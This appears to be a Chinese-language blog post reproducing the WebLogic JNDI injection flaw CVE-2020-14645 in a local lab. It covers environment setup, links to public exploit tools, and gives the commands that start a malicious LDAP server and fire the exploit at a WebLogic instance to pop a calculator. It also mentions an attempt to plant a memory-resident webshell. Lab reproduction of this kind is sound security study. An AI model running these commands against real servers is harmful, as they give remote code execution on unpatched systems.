CVE-2020-14645 Weblogic JNDI injection 漏洞复现

CVE-2020-14645 Weblogic JNDI injection 漏洞复现

Scroll Down

CVE-2020-14645

主要最近在研究weblogic的内存马,在github上面搜到https://github.com/feihong-cs/JNDIExploit 这个项目里面有一段内存马代码,想套用到14882那个漏洞上面,但是发现cmdshell可以,冰蝎的马好像有些问题。既然他是JNDI注入来运行class,那么我就想能不能和CVE-2020-14645联动起来。最终结果是失败的,原因暂时没有找到。

那么主要来复现一下CVE-2020-14645这个漏洞。

安装环境

安装jdk 8u131 版本,去官网下载即可,安装过程就省略了~
地址:https://www.oracle.com/cn/java/technologies/javase/javase8-archive-downloads.html

安装Weblogic 12.2.1.4版本,也去官网下载。
地址:https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html

管理员身份运行cmd,然后输入jdk地址和安装包地址:

Snipaste_20201125_134043.jpg

一直下一步就行

Snipaste_20201125_134307.jpg

这里全部勾选最好。

Snipaste_20201125_134336.jpg

运行Weblogic
Snipaste_20201125_134512.jpg

下载工具

这里直接用github上面有的工具打就可以了

https://github.com/DSO-Lab/defvul/tree/master/CVE-2020-14645_Weblogic

下载下来然后mvn编译一下,即可

使用方法:

java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL

这里需要起一个JNDI服务,所以用到

https://github.com/welk1n/JNDI-Injection-Exploit 这个工具

复现成功

首先输入命令:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc -A 192.168.91.1

起一个ldap的服务

然后在输入:

java -jar CVE-2020-14645.jar 192.168.91.1:1389/bcbiyj http://192.168.91.4:7001

最后成功弹出计算器

Snipaste_20201125_141013.jpg